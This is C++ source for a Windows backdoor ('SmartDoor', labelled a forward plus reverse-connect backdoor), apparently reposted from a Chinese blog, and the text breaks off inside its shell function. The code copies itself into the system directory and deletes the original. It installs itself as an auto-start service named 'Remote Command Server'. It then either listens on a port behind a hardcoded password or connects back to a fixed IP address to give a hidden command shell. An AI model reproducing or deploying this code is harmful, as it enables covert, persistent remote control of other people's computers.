// SmartDoor.cpp : 定义 DLL 应用程序的入口点。
//http://www.dream2fly.net/
//源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^
#include "stdafx.h"
#include "SDdllw.h"
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#include <string>
using namespace::std;
#include <Shellapi.h>
#include <winsock2.h>
#include <urlmon.h>
#pragma comment (lib,"ws2_32")
#pragma comment (lib, "urlmon.lib")
void LogToFile(const char * , int nErrNo = 0) ; //日志记录
#define MAXLINK 5 //客户端连接最大数目
#define PASSWORD "dream2fly" //连接密码
u_short g_nPort = 12345; //定义监听端口
//#define _REVERSE 1
#define BUFLEN 65535
bool Passport(SOCKET *csock);
void ConnectClient();
void ShellServer();
//命令行执行函数
DWORD WINAPI ExeCmdShell(LPVOID lp);
#define SERVICENAME "Remote Command Server"
#define SERVICEDISPLAYNAME SERVICENAME
SC_HANDLE scm,svc;
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
DWORD IsService( BOOL& );
int InitService();
void InstallService();
int DeleteSvc();
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv);
void WINAPI ServiceCtrlHandler(DWORD dwControl);
#ifdef _MYEXE
//程序入口
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
{
int nArg;
LPWSTR *para = CommandLineToArgvW(::GetCommandLineW(),&nArg);
if (nArg!=1)
{
g_nPort=_wtoi(para[1]);
}
LocalFree(para);
InitService();
return 0;
}
#else
//程序入口
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
#endif
int InitService(void)
{
//服务入口表
SERVICE_TABLE_ENTRY ServiceTableEntry[] = {
{ SERVICENAME, ServiceMain },
{ NULL, NULL } };
BOOL bService = TRUE;
// This process should be a service :)
IsService( bService );
if ( bService )
{ // Start service
LogToFile( "This process is service" , GetLastError() );
if (!StartServiceCtrlDispatcher(ServiceTableEntry))
{
LogToFile( "StartServiceCtrlDispatcher" , GetLastError() );
InstallService();
}
}
else//如果不是服务启动,安装服务
{
LogToFile( "This process is not service" , GetLastError() );
InstallService();
}
return 0;
}
//http://www.dream2fly.net/
//源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^
// Deletes service
int DeleteSvc()
{
// Open service manager
SC_HANDLE hSCM = ::OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCM == NULL)
{
LogToFile( "DeleteSvc->OpenSCManager" ,GetLastError() );
return 0;
}
// OPen service
SC_HANDLE hService = ::OpenService( hSCM, SERVICENAME, SERVICE_ALL_ACCESS );
if (hService == NULL)
{
LogToFile( "DeleteSvc->OpenService" ,GetLastError() );
::CloseServiceHandle(hSCM);
return 0;
}
//SERVICE_STATUS status;
//if(!ControlService(hService, SERVICE_CONTROL_STOP, &status))
//{
// LogToFile( "DeleteSvc->ControlService", GetLastError() );
//}
// Deletes service from service database
if (0 == DeleteService( hService ))
{
LogToFile( "DeleteSvc->DeleteService" ,GetLastError() );
return 0;
}
// Stop the service
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwServiceSpecificExitCode = 0;
if (!SetServiceStatus (ServiceStatusHandle, &ServiceStatus))
{
LogToFile( "DeleteSvc->SetServiceStatus", GetLastError() );
}
::CloseServiceHandle(hService);
::CloseServiceHandle(hSCM);
return 0;
}
string WideToMutilByte(const wstring& _src)
{
int nLen = (int)_src.length();
char *pszTemp = new char[sizeof(wchar_t)*(nLen + 1)];
int pos = WideCharToMultiByte(GetACP(), 0, _src.c_str(), nLen, pszTemp, sizeof(wchar_t)*(nLen + 1), 0, FALSE);
pszTemp[pos] = '/0';
string strRet(pszTemp);
delete []pszTemp;
return strRet;
}
void InstallService()
{
char szSysDir[MAX_PATH] = {0};
GetSystemDirectory(szSysDir,sizeof(szSysDir));
#ifdef _MYEXE
//获得进程的绝对路径
char szExePath[MAX_PATH] = {0};
//获得本程序EXE所在地的full path
GetModuleFileName(NULL,szExePath,MAX_PATH);
//获得执行文件名
char *ExeName=szExePath+strlen(szExePath);
for(;*ExeName!='//';ExeName--)
NULL;
ExeName++;
char szServicPath[MAX_PATH];
memset(szServicPath,0,sizeof(szServicPath));
strcpy(szServicPath, szSysDir);
strcat(szServicPath,"//");
strcat(szServicPath,ExeName);
#else
char szCurDir[MAX_PATH] = {0};
GetCurrentDirectory(MAX_PATH-1,szCurDir);
TCHAR szExeFile[MAX_PATH] = {0};
int nArg;
LPWSTR *para = CommandLineToArgvW(::GetCommandLineW(),&nArg);
if (nArg!=1)
{
_tcscpy(szExeFile, WideToMutilByte(para[1]).c_str());
}
//获得执行文件名
char *ExeNameEnd=szExeFile;
for(;*ExeNameEnd!=',';ExeNameEnd++)
NULL;
char szExePath[MAX_PATH] = {0};
strcpy(szExePath, szCurDir);
strcat(szExePath,"//");
strncat(szExePath,szExeFile, ExeNameEnd - szExeFile);
char szServicPath[MAX_PATH] = {0};
strcpy(szServicPath, szSysDir);
strcat(szServicPath,"//");
strncat(szServicPath,szExeFile, ExeNameEnd - szExeFile);
#endif
#ifdef _DEBUG
strcpy(szServicPath, szExePath);
#else
//成功返回1,失败返回0.复制方向--->>
if(!CopyFile(szExePath,szServicPath,FALSE))
{
LogToFile( "CopyFile" , GetLastError() );
}
#endif
if(stricmp(szExePath, szServicPath))
{
DeleteFile(szExePath);
}
char szDllStartPath[MAX_PATH] = {0};
#ifdef _MYEXE
strcpy(szDllStartPath, szExePath);
#else
strcpy(szDllStartPath, szSysDir);
strcat(szDllStartPath, "//rundll32.exe ");
strcat(szDllStartPath, szServicPath);
strcat(szDllStartPath, ",InitService");
#endif
//实现服务启动
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm==NULL)
{
LogToFile( "OpenSCManager" ,GetLastError() );
}
else
{
svc=::CreateService(scm,SERVICENAME,SERVICEDISPLAYNAME,SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szDllStartPath,NULL,NULL,NULL,NULL,NULL);
if (svc != NULL || GetLastError() == ERROR_SERVICE_EXISTS)
{
LogToFile( "OpenService..." , GetLastError() );
svc=::OpenService(scm,SERVICENAME,SERVICE_START);
if (svc == NULL)
{
LogToFile( "OpenService", GetLastError() );
}
else
{
if (!StartService(svc,0,NULL))
{
LogToFile( "StartService", GetLastError() );
}
}
}
else
{
LogToFile( "CreateService", GetLastError() );
}
CloseServiceHandle(svc);
CloseServiceHandle(scm);
}
}
//服务控制器
void WINAPI ServiceCtrlHandler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState=SERVICE_RUNNING;
break;
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState=SERVICE_PAUSED;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
if (!SetServiceStatus (ServiceStatusHandle,&ServiceStatus))
{
LogToFile( "ServiceCtrlHandler->SetServiceStatus", GetLastError() );
}
return;
}
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
ServiceStatus.dwServiceType=SERVICE_WIN32;
ServiceStatus.dwCurrentState=SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode=0;
ServiceStatus.dwWaitHint=0;
ServiceStatus.dwCheckPoint=0;
ServiceStatus.dwWin32ExitCode=0;
ServiceStatusHandle=RegisterServiceCtrlHandler(SERVICENAME,ServiceCtrlHandler);
if (ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
{
LogToFile( "ServiceMain->RegisterServiceCtrlHandler", GetLastError() );
return;
}
//一个服务对应一个控制处理器
//设为运行状态
ServiceStatus.dwCurrentState=SERVICE_RUNNING;
ServiceStatus.dwWaitHint=0;
ServiceStatus.dwCheckPoint=0;
if (!SetServiceStatus (ServiceStatusHandle, &ServiceStatus))
{
LogToFile( "ServiceMain->SetServiceStatus", GetLastError() );
}
else
{
#ifdef _REVERSE
while (1)
{
ConnectClient();
Sleep(100);
}
#else
ShellServer();
#endif
}
return ;
}
void ConnectClient()
{
int ret;
WSADATA wsa;
ret=WSAStartup(0x0202,&wsa);
if(ret==INVALID_SOCKET)
{
LogToFile( "WSAStartup " , GetLastError() );
exit(-1);
}
SOCKET ssock;
ssock=socket(AF_INET,SOCK_STREAM,0);
if(ssock==INVALID_SOCKET){
LogToFile( "socket " , GetLastError() );
exit(-1);
}
//SO_REUSEADDR:允许重用本地地址和端口 int
BOOL flag=TRUE;
ret=setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(char*)&flag,sizeof(flag));
if(ret==SOCKET_ERROR){
LogToFile( "setsockopt " , GetLastError() );
exit(-1);
}
struct sockaddr_in sin;
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=inet_addr("192.168.2.22");
sin.sin_port=htons(666);
//向客户端发出连接请求,Connect函数的第一个参数是发出请求的客户端的套接字,第二个参数是服务端的地址结构,第三个参数是Server地址结构的长度。
if (connect(ssock, (struct sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
LogToFile( "connect" , GetLastError() );
}
else
{
HANDLE h=CreateThread(NULL,0,ExeCmdShell,&ssock,0,0);
WaitForSingleObject(h,INFINITE);
}
closesocket(ssock);
WSACleanup();
}
void ShellServer()
{
int ret;
WSADATA wsa;
ret=WSAStartup(0x0202,&wsa);
if(ret==INVALID_SOCKET)
{
LogToFile( "WSAStartup " , GetLastError() );
exit(-1);
}
SOCKET ssock;
ssock=socket(AF_INET,SOCK_STREAM,0);
if(ssock==INVALID_SOCKET){
LogToFile( "socket " , GetLastError() );
exit(-1);
}
//SO_REUSEADDR:允许重用本地地址和端口 int
BOOL flag=TRUE;
ret=setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(char*)&flag,sizeof(flag));
if(ret==SOCKET_ERROR){
LogToFile( "setsockopt " , GetLastError() );
exit(-1);
}
struct sockaddr_in sin;
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=htonl(ADDR_ANY);
sin.sin_port=htons(g_nPort);
ret=bind(ssock,(struct sockaddr*)&sin,sizeof(sin));
if(ret==SOCKET_ERROR){
LogToFile( "bind " , GetLastError() );
exit(-1);
}
ret=listen(ssock,MAXLINK);
if(ret==SOCKET_ERROR)
{
LogToFile( "listen " , GetLastError() );
exit(-1);
}
while(1)
{
//csock是ssock接受 accept的数据
SOCKET csock=accept(ssock,NULL,NULL);
if(csock==INVALID_SOCKET)
{
LogToFile( "accept" , GetLastError() );
}
HANDLE h=CreateThread(NULL,0,ExeCmdShell,&csock,0,0);
if(h!=NULL)
{
WaitForSingleObject(h,INFINITE);
closesocket(csock);
CloseHandle(h);
}
}
closesocket(ssock);
WSACleanup();
}
//ExeCmdShell: 建立两个管道,实现交互通信 .
DWORD WINAPI ExeCmdShell(LPVOID lp)
{
SOCKET *csock=(SOCKET*)lp;
char *exitok = "/r/n Exit OK! Bye byte!/r/n";
unsigned long lbyte;
char szBuf[BUFLEN]={0};
int ret;
//验证
if(Passport(csock)==false)
{
LogToFile( "Passport", GetLastError() );
closesocket(*csock);
return -1;
}
SECURITY_ATTRIBUTES sa;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
STARTUPINFO si;
memset(&si,0,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
sdcs V2.3 exe/dll 正+反弹后门
最新推荐文章于 2024-04-19 11:55:38 发布